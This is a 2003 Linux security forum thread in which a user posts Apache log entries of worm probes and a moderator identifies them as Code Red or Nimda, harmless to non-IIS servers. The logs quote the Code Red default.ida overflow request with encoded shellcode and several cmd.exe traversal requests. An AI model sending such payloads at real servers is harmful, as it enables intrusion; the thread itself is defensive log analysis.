LinuxQuestions.org
Go Job Hunting at the LQ Job Marketplace
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices

Reply
 
Search this Thread
Old 06-13-2003, 04:46 PM   #1
saturn_vk
Member
 
Registered: Feb 2003
Location: Sofia
Distribution: slackware
Posts: 104

Rep: Reputation: 15
strange apache access.log


i get these strange hits in the log:
Code:
213.47.116.38 - - [11/Jun/2003:00:21:32 +0300] "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%
u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 -
213.145.18.88 - - [11/Jun/2003:03:09:08 +0300] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u780
1%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 272
213.245.99.128 - - [11/Jun/2003:15:01:46 +0300] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u78
01%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 272
213.130.85.164 - - [11/Jun/2003:17:24:43 +0300] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u78
01%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 272
64.164.70.250 - - [11/Jun/2003:20:33:22 +0300] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
213.37.92.126 - - [12/Jun/2003:02:36:59 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 277
213.37.92.126 - - [12/Jun/2003:02:37:11 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 275
213.37.92.126 - - [12/Jun/2003:02:37:19 +0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 285
137.251.109.215 - - [12/Jun/2003:08:53:44 +0300] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404
 -
and similar ones.

now i've checked in google and the exe ones appear to be from a worm. even though people say it only affects IIS(sp?), will it affect me?
but i could not find anything on the XXXXXXXXXXXXXXXXX....... hits.

any suggestions? should i report the ip to the isp if it's a worm, or would that just be a waste of time as they would most probably figure it out?
 
Old 06-13-2003, 04:48 PM   #2
acid_kewpie
Moderator
 
Registered: Jun 2001
Location: UK
Distribution: Gentoo, RHEL, Fedora, Centos
Posts: 43,378

Rep: Reputation: 1963Reputation: 1963Reputation: 1963Reputation: 1963Reputation: 1963Reputation: 1963Reputation: 1963Reputation: 1963Reputation: 1963Reputation: 1963Reputation: 1963
that's nimda. or code red.... just ignore it. it does only affect IIS, unless you, for some bizarre reason, do have a root.exe file which can be easily compromised... but it is still an access to the web server, so will be logged.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
Strange Apache log entrance dominant Linux - Security 0 09-27-2004 01:39 PM
Strange results in /var/log/apache/access.log subt13 Linux - Security 2 08-03-2004 01:21 PM
Strange thing in Apache log nerdstat Linux - Networking 3 07-19-2004 09:54 AM
Apache access log ncorreia Linux - Software 2 10-10-2003 04:45 AM
apache access log mindcry Linux - Security 6 02-12-2003 12:17 PM


All times are GMT -5. The time now is 10:15 PM.

Main Menu
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration